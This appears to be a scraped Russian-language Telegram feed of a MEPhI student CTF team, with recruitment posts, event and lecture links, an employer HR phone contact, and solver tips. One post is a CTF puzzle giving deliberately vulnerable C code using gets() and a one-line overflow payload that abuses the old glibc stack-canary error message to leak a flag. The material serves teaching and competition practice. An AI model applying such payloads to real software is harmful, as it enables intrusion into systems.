Ребят, нам нужны люди для замен на CTF Kazan, которая будет on-site в Казани 7-8 ноября. Призовой фонд - 300 тысяч рублей. Если ты:
1) Учишься в бакалавриате МИФИ
2) Играл адэшки или имеешь неплохой опыт системного администрирования
3) Хорошо владеешь скриптингом на Python и умеешь понимать что делает программа на неизвестном языке програмирования
4) Не боишься летать на самолёте
То пиши @pturtle, нам нужно примерно 5 человек. Если не наберётся нужное количество, то будем вынуждены пропустить CTF Kazan.
1) Учишься в бакалавриате МИФИ
2) Играл адэшки или имеешь неплохой опыт системного администрирования
3) Хорошо владеешь скриптингом на Python и умеешь понимать что делает программа на неизвестном языке програмирования
4) Не боишься летать на самолёте
То пиши @pturtle, нам нужно примерно 5 человек. Если не наберётся нужное количество, то будем вынуждены пропустить CTF Kazan.
Forwarded from CTF в формате шоу (Nikita Sychev)
Организаторы VolgaCTF зовут всех на онлайн мастер-классы по линуксу, сетям и CTF для начинающих
1–8 ноября
Онлайн
Программа: https://xn--r1a.website/volgactf/167
Регистрация: https://forms.gle/X6eFNkpY4QyNZUwq9
1–8 ноября
Онлайн
Программа: https://xn--r1a.website/volgactf/167
Регистрация: https://forms.gle/X6eFNkpY4QyNZUwq9
Telegram
VolgaCTF
🤓Быть умным и много знать – хорошо и прибыльно. Мы тебе в этом поможем!
С 1 ноября команда движения волонтеров цифрового развития Самарской области запускает онлайн-лекции! Конечно, не без нашего участия.
Для кого: для всех, кто хочет в технологии, но…
С 1 ноября команда движения волонтеров цифрового развития Самарской области запускает онлайн-лекции! Конечно, не без нашего участия.
Для кого: для всех, кто хочет в технологии, но…
Борда пережила вынужденную перезагрузку и все таски лежат. Поднимем завтра.
Forwarded from Deleted Account
Всем привет. У меня некоторые ребята спрашивали по поводу трудоустройства в BI.ZONE. Я уточнил по этому поводу у людей с работы. Сказали, что вы можете связаться со Светой (наш HR) напрямую:
+7 909 295 28 27, @yarainbow
+7 909 295 28 27, @yarainbow
Хинт на sudoku.
Иногда решая крипту или реверс упираешься в сложную конструкцию из услових, ограничивающих значения набора переменных. Если переменных и условий немного, то можно накостылять наивный перебор. Если же количество сущностей переваливает за какой-то предел, все становится плохо. На помощь могут придти SMT-солверы. Например, z3.
Если коротко, то вы создаете объект солвера, добавляете в него ограничения на переменные, проверяете satisfiability и, если модель совместна, можете получить решение. Практически магическим образом.
Хорошая книжка по smt-солверам.
Иногда решая крипту или реверс упираешься в сложную конструкцию из услових, ограничивающих значения набора переменных. Если переменных и условий немного, то можно накостылять наивный перебор. Если же количество сущностей переваливает за какой-то предел, все становится плохо. На помощь могут придти SMT-солверы. Например, z3.
Если коротко, то вы создаете объект солвера, добавляете в него ограничения на переменные, проверяете satisfiability и, если модель совместна, можете получить решение. Практически магическим образом.
Хорошая книжка по smt-солверам.
В качестве хинта на
Чтобы позапускать ячейки у себя, тетрадку нужно скопировать, собственно, к себе.
Follow me и Нормальное название расписал решение простой задачи скрейпинга на колабе. Надеюсь, после этого солвов станет чуть больше. Ну и скрейпинг в принципе полезный навык. Чтобы позапускать ячейки у себя, тетрадку нужно скопировать, собственно, к себе.
Google
Google Colaboratory
Media is too big
VIEW IN TELEGRAM
Наконец-то нормальный доклад. Только из-за Павловича в Казань приехали.
15 ноября будут проходить квалы на Student CTF 2020 от питерских ребят. Командам не из университетов или колледжей Санкт-Петербурга выделено 10 мест для прохода в финальный этап, который пройдет 29 ноября онлайн.
Зарегистрироваться можно вот тут: student.ctf.su
Зарегистрироваться можно вот тут: student.ctf.su
Сообщение в чате The Standoff, который пройдет с 12 по 17 ноября, и где мы будем участвовать сборной мифишной командой.
https://tass.ru/novosti-partnerov/9902489
https://tass.ru/novosti-partnerov/9902489
Forwarded from CBS Media
Знаете что бывает, если принять слишком близко к сердцу фразу "А давайте сделаем тематический контест"?
А мы ведь делаем.
#view_cbs
А мы ведь делаем.
#view_cbs
Загадка от Жака Фреско: можно ли получить arbitrary read и прочитать флаг с таким кодом при выключенном PIE и включенной канарейке.
На размышление даётся 30 секунд.
#include <fcntl.h>libc6_2.23-0ubuntu11.2_amd64
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char ptr[128] = {0};
void read_flag() {
int fd;
fd = open("flag.txt", O_RDONLY);
read(fd, ptr, 128);
close(fd);
}
int main() {
char buf[16];
read_flag();
gets(buf);
}
На размышление даётся 30 секунд.
Итак, решение.
В libc до версии 2.23 включительно функция stack_chk_fail, отвечающая за проверку целостности канарейки, была реализована с уязвимостью. По сути выглядело это следующим образом: при аварийном завершении программы, которое происходит при попытке реализовать переполнение буфера на стеке, stack_chk_fail выводила
Имя запущенной программы она брала из переменной libc_argv, которая, в свою очередь, тоже лежит на стеке, а стек, как мы помним, полностью в руках атакующего. Таким образом, атакующий мог переполнить буфер и заставить переменную libc_argv указывать не на строку, содержащую имя запущенной программы, а в любое другое место.
Эксплойт выглядит крайне просто (допустим, что значение, которое нужно слить, лежит по адресу 0x404080, как было в нашем случае):
В libc до версии 2.23 включительно функция stack_chk_fail, отвечающая за проверку целостности канарейки, была реализована с уязвимостью. По сути выглядело это следующим образом: при аварийном завершении программы, которое происходит при попытке реализовать переполнение буфера на стеке, stack_chk_fail выводила
*** stack smashing detected ***: ./binaryname terminated
Aborted (core dumped)
Имя запущенной программы она брала из переменной libc_argv, которая, в свою очередь, тоже лежит на стеке, а стек, как мы помним, полностью в руках атакующего. Таким образом, атакующий мог переполнить буфер и заставить переменную libc_argv указывать не на строку, содержащую имя запущенной программы, а в любое другое место.
Эксплойт выглядит крайне просто (допустим, что значение, которое нужно слить, лежит по адресу 0x404080, как было в нашем случае):
python2 -c "print 'A'*264+'\x80\x40\x40\x00\x00\x00\x00\x00'" | ./a.out
В среду Денис Макрушин снова приглашает на открытую лекцию. В этот раз вести её будет Александр Барабанов, Principal Security Architect в команде Huawei Advanced Security Research. Тема лекции - Безопасность микросервисной архитектуры и её типовые уязвимости.
Topic: Denis Makrushin's Open Lecture
Time: Nov 18, 2020 05:55 PM Moscow
Join Zoom Meeting
https://zoom.us/j/95098133837?pwd=eHBVYzlBSkhjTlM5NXgvYmF1SldxZz09
Topic: Denis Makrushin's Open Lecture
Time: Nov 18, 2020 05:55 PM Moscow
Join Zoom Meeting
https://zoom.us/j/95098133837?pwd=eHBVYzlBSkhjTlM5NXgvYmF1SldxZz09
Zoom Video
Join our Cloud HD Video Meeting
Zoom is the leader in modern enterprise video communications, with an easy, reliable cloud platform for video and audio conferencing, chat, and webinars across mobile, desktop, and room systems. Zoom Rooms is the original software-based conference room solution…
Господа, вопрос.
Достаточно ли санитизировать < и > для полной защиты от XSS?
Это честно вопрос, я сам не знаю)
Достаточно ли санитизировать < и > для полной защиты от XSS?
Это честно вопрос, я сам не знаю)